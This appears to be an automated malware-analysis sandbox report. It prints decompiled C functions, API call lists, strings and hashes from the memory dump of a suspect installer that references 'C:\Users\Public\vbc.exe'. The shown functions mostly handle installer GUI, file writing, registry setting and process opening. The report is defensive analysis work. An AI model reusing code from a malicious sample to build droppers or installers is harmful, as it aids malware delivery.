              0x00405e5a
              0x00405e5a
              0x00405e5b
              0x00405e5d
              0x00405e61
              0x00405e63
              0x00405e6c
              0x00405e6e
              0x00405e88
              0x00405e90
              0x00405e90
              0x00405e95
              0x00405e97
              0x00405e99
              0x00405e9d
              0x00405e9e
              0x00405ea1
              0x00405ea9
              0x00405eab
              0x00405eaf
              0x00000000
              0x00000000
              0x00405eb5
              0x00405eba
              0x00000000
              0x00000000
              0x00000000
              0x00405eba
              0x00405ebf

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Char$Next$Prev
              • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-1374994687
              • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
              • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
              • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
              • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








              0x00403efc
              0x00403f90
              0x00000000
              0x00403f90
              0x00403f0d
              0x00403f11
              0x00000000
              0x00000000
              0x00403f17
              0x00403f20
              0x00403f23
              0x00403f23
              0x00403f29
              0x00403f2f
              0x00403f2f
              0x00403f3b
              0x00403f41
              0x00403f48
              0x00403f4b
              0x00403f4e
              0x00403f50
              0x00403f50
              0x00403f58
              0x00403f5e
              0x00403f5e
              0x00403f68
              0x00403f6d
              0x00403f70
              0x00403f75
              0x00403f78
              0x00403f78
              0x00403f88
              0x00403f88
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
              • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
              • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
              • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x8800
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











              0x004026af
              0x004026b1
              0x004026bd
              0x004026c0
              0x004026ca
              0x004026ce
              0x004026ce
              0x004026d4
              0x004026e1
              0x004026e9
              0x004026ec
              0x004026f2
              0x00402700
              0x00402705
              0x00402709
              0x0040270c
              0x00402715
              0x00402721
              0x00402725
              0x00402728
              0x00402732
              0x00402751
              0x00402739
              0x0040273e
              0x00402746
              0x00402749
              0x0040274e
              0x0040274e
              0x00402758
              0x00402758
              0x0040276a
              0x00402771
              0x00402783
              0x00402783
              0x00402789
              0x00402789
              0x00402794
              0x00402795
              0x00402799
              0x0040279d
              0x004027a3
              0x004027a3
              0x004027aa
              0x00402197
              0x004028c1
              0x004028cd

              APIs
              • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
              • GlobalFree.KERNEL32(?), ref: 00402758
              • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
              • GlobalFree.KERNEL32(00000000), ref: 00402771
              • CloseHandle.KERNEL32(?), ref: 00402789
              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
              • String ID:
              • API String ID: 3294113728-0
              • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
              • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
              • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
              • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















              0x00404eb9
              0x00404ec5
              0x00404ec8
              0x00404ece
              0x00404eda
              0x00404edd
              0x00404ee0
              0x00404ee6
              0x00404ee6
              0x00404eec
              0x00404ef4
              0x00404ef7
              0x00404f14
              0x00404f18
              0x00404f21
              0x00404f21
              0x00404f2b
              0x00404f34
              0x00404f40
              0x00404f47
              0x00404f4b
              0x00404f4e
              0x00404f61
              0x00404f6f
              0x00404f6f
              0x00404f73
              0x00404f75
              0x00404f78
              0x00000000
              0x00404f78
              0x00404ef9
              0x00404f01
              0x00404f09
              0x00404f0f
              0x00000000
              0x00404f0f
              0x00404f09
              0x00404ef7
              0x00404f82

              APIs
              • lstrlenA.KERNEL32(00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
              • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
              • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041A276,74EC110C), ref: 00404F0F
              • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
              • SendMessageA.USER32 ref: 00404F47
              • SendMessageA.USER32 ref: 00404F61
              • SendMessageA.USER32 ref: 00404F6F
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrlen$TextWindowlstrcat
              • String ID:
              • API String ID: 2531174081-0
              • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
              • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
              • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
              • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














              0x00404790
              0x0040479d
              0x004047a3
              0x004047e1
              0x004047e1
              0x004047f0
              0x004047f7
              0x00000000
              0x004047f9
              0x004047a5
              0x004047b4
              0x004047bc
              0x004047bf
              0x004047d1
              0x004047d7
              0x004047de
              0x00000000
              0x004047de
              0x00000000

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
              • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
              • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
              • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0x8800
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






              0x00402b7b
              0x00402b89
              0x00402b8f
              0x00402b8f
              0x00402b9d
              0x00402b9f
              0x00402ba5
              0x00402bac
              0x00402bae
              0x00402bae
              0x00402bc4
              0x00402bd4
              0x00402be6
              0x00402be6
              0x00402bee

              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
              • MulDiv.KERNEL32 ref: 00402BB4
              • wsprintfA.USER32 ref: 00402BC4
              • SetWindowTextA.USER32(?,?), ref: 00402BD4
              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BE6
              Strings
              • verifying installer: %d%%, xrefs: 00402BBE
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: verifying installer: %d%%
              • API String ID: 1451636040-82062127
              • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
              • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
              • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
              • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 730641A0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 159COMMON
              Download Yara Rule
              C-Code - Quality: 35%
              			E730641A0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, int _a28, int _a32) {
				int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				void* _v48;
				int _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				int _t71;
				int _t73;
				int _t77;
				int _t80;
				int _t89;
				void* _t117;
				void* _t122;
				void* _t123;
				void* _t124;

				_v40 = E73061490(_a4);
				_v36 = 0x80004005;
				_t67 = _a24;
				0x73060000(_a20, _t67, _a28, _a32);
				_t68 = _a12;
				0x73060000(_t68, _a16, _t67);
				0x73060000("%p, %u, %s, %s, %p, %u, %p.\n", _a4, _a8, _t68);
				_push(_v40);
				_t70 = E73061120(_v40);
				_t122 = _t117 + 0x34;
				_v20 = _t70;
				if(_v20 == 0) {
					return 0x8000ffff;
				}
				__eflags = _a8 - 0xffffffff;
				if(__eflags != 0) {
					_t71 = E730613B0(__eflags, _v20, _a8);
					_t123 = _t122 + 8;
					_v12 = _t71;
				} else {
					_t89 = E730613F0(__eflags, _v20, _a12, _a16);
					_t123 = _t122 + 0xc;
					_v12 = _t89;
				}
				__eflags = _v12;
				if(_v12 != 0) {
					_t73 = GetFileVersionInfoSizeA(_v12 + 0x40,  &_v44);
					_v8 = _t73;
					__eflags = _v8;
					if(_v8 != 0) {
						0x73060000(_v8);
						_t124 = _t123 + 4;
						_v16 = _t73;
						__eflags = _v16;
						if(_v16 != 0) {
							_t77 = GetFileVersionInfoA(_v12 + 0x40, _v44, _v8, _v16);
							__eflags = _t77;
							if(_t77 == 0) {
								L27:
								0x73060000(_v16);
								return _v36;
							}
							_t80 = VerQueryValueA(_v16, _a20,  &_v48,  &_v8);
							__eflags = _t80;
							if(_t80 == 0) {
								goto L27;
							}
							__eflags = _a32;
							if(_a32 != 0) {
								 *_a32 = _v8;
							}
							__eflags = _a24;
							if(_a24 != 0) {
								__eflags = _a28;
								if(_a28 != 0) {
									__eflags = _v8 - _a28;
									if(_v8 >= _a28) {
										_v24 = _a28;
									} else {
										_v24 = _v8;
									}
									_v28 = _v24;
									__eflags = _v28;
									if(_v28 != 0) {
										0x73060000(_a24, _v48, _v28);
										_t124 = _t124 + 0xc;
									}
								}
							}
							__eflags = _a24;
							if(_a24 == 0) {
								L25:
								_v32 = 0;
								L26:
								_v36 = _v32;
								goto L27;
							}
							__eflags = _a28 - _v8;
							if(_a28 >= _v8) {
								goto L25;
							}
							_v32 = 1;
							goto L26;
						}
						return 0x8007000e;
					}
					return 0x80004005;
				} else {
					0x73060000("Was unable to locate module.\n");
					return 0x80070057;
				}
			}


























              0x730641b2
              0x730641b5
              0x730641c4
              0x730641cc
              0x730641d9
              0x730641dd
              0x730641f3
              0x730641fe
              0x730641ff
              0x73064204
              0x73064207
              0x7306420e
              0x00000000
              0x73064210
              0x7306421a
              0x7306421e
              0x73064241
              0x73064246
              0x73064249
              0x73064220
              0x7306422c
              0x73064231
              0x73064234
              0x73064234
              0x7306424c
              0x73064250
              0x73064274
              0x73064279
              0x7306427c
              0x73064280
              0x73064290
              0x73064295
              0x73064298
              0x7306429b
              0x7306429f
              0x730642be
              0x730642c3
              0x730642c5
              0x73064358
              0x7306435c
              0x00000000
              0x73064364
              0x730642db
              0x730642e0
              0x730642e2
              0x00000000
              0x00000000
              0x730642e4
              0x730642e8
              0x730642f0
              0x730642f0
              0x730642f2
              0x730642f6
              0x730642f8
              0x730642fc
              0x73064301
              0x73064304
              0x73064311
              0x73064306
              0x73064309
              0x73064309
              0x73064317
              0x7306431a
              0x7306431e
              0x7306432c
              0x73064331
              0x73064331
              0x7306431e
              0x730642fc
              0x73064334
              0x73064338
              0x7306434b
              0x7306434b
              0x73064352
              0x73064355
              0x00000000
              0x73064355
              0x7306433d
              0x73064340
              0x00000000
              0x00000000
              0x73064342
              0x00000000
              0x73064342
              0x00000000
              0x730642a1
              0x00000000
              0x73064252
              0x73064257
              0x00000000
              0x7306425f

              Strings
              • %p, %u, %s, %s, %p, %u, %p., xrefs: 730641EE
              • Was unable to locate module., xrefs: 73064252
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID: %p, %u, %s, %s, %p, %u, %p.$Was unable to locate module.
              • API String ID: 0-1385147342
              • Opcode ID: cb62e0e27fee877367d851148de180fb0bc8cb8ceadee9c8109839dbd3e48b2d
              • Instruction ID: 30779d81947da2f4556108a79856dc41912f47f7df398561d9c9cc8583ea3245
              • Opcode Fuzzy Hash: cb62e0e27fee877367d851148de180fb0bc8cb8ceadee9c8109839dbd3e48b2d
              • Instruction Fuzzy Hash: 4A513CB5D04219EFDB04CF94D880BDEB3F9BF88B04F548618E916A7248D734EA54CBA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 73066A70, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92COMMON
              Download Yara Rule
              C-Code - Quality: 17%
              			E73066A70(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long* _t49;

				_v28 = E730614A0(_a4);
				0x73060000("%p, %#x, %u.\n", _a4, _a8, _a12);
				_push(_v28);
				_v8 = E73061120(_a4);
				if(_v8 != 0) {
					if((_v8[1] & 0x00000001) == 0) {
						0x73060000("Unsupported attach flags %#x.\n", _v8[1]);
						return 0x80004001;
					}
					if((_v8[1] & 0x00000004) != 0) {
						_v16 = 0;
					} else {
						_v16 = 1;
					}
					_v20 = _v16;
					_v12 = 0x1030;
					if(_v20 != 0) {
						_v12 = _v12 | 0x00000800;
					}
					_v8[2] = OpenProcess(_v12, 0,  *_v8);
					if(_v8[2] != 0) {
						if(_v20 != 0) {
							_t49 = _v8;
							0x73060000( *((intOrPtr*)(_t49 + 8)));
							_v24 = _t49;
							if(_v24 != 0) {
								0x73060000("Failed to suspend a process, status %#x.\n", _v24);
							}
						}
						return 0;
					} else {
						0x73060000("Failed to get process handle for pid %#x.\n",  *_v8);
						return 0x8000ffff;
					}
				}
				return 0x8000ffff;
			}










              0x73066a82
              0x73066a96
              0x73066aa1
              0x73066aaa
              0x73066ab1
              0x73066ac6
              0x73066b82
              0x00000000
              0x73066b8a
              0x73066ad5
              0x73066ae0
              0x73066ad7
              0x73066ad7
              0x73066ad7
              0x73066aea
              0x73066aed
              0x73066af8
              0x73066b03
              0x73066b03
              0x73066b1b
              0x73066b25
              0x73066b45
              0x73066b47
              0x73066b4e
              0x73066b56
              0x73066b5d
              0x73066b68
              0x73066b6d
              0x73066b5d
              0x00000000
              0x73066b27
              0x73066b32
              0x00000000
              0x73066b3a
              0x73066b25
              0x00000000

              APIs
              • OpenProcess.KERNEL32(00001030,00000000,00000000), ref: 73066B12
              Strings
              • %p, %#x, %u., xrefs: 73066A91
              • Unsupported attach flags %#x., xrefs: 73066B7D
              • Failed to get process handle for pid %#x., xrefs: 73066B2D
              • Failed to suspend a process, status %#x., xrefs: 73066B63
              Memory Dump Source
              • Source File: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp Download File
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp Download File
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: OpenProcess
              • String ID: %p, %#x, %u.$Failed to get process handle for pid %#x.$Failed to suspend a process, status %#x.$Unsupported attach flags %#x.
              • API String ID: 3743895883-1030270061
              • Opcode ID: 0e850805c8de28bc22dcca42a48bdf92b7944996cef7409904091f84819d0352
              • Instruction ID: 9817c839756a1264bd0468bb6cd7cb1c5e987fce4ab7a8b0ce9da08d82278e6a
              • Opcode Fuzzy Hash: 0e850805c8de28bc22dcca42a48bdf92b7944996cef7409904091f84819d0352
              • Instruction Fuzzy Hash: 74314DB9E00109EFEB00DF94C951BAEB7F5BB84704F14815CE806AB389D735AE90CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
              Download Yara Rule
              C-Code - Quality: 85%
              			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x42ecd0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a440 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
				return 0;
			}











              0x00402337
              0x0040233c
              0x00402346
              0x00402350
              0x00402353
              0x0040235d
              0x0040236d
              0x00402374
              0x0040237c
              0x0040238a
              0x0040238e
              0x00402399
              0x00402399
              0x0040239d
              0x004023a1
              0x004023a7
              0x004023ac
              0x004023ac
              0x004023b0
              0x004023bc
              0x004023bc
              0x004023d5
              0x004023d7
              0x004023d7
              0x004023da
              0x004024b0
              0x004024b0
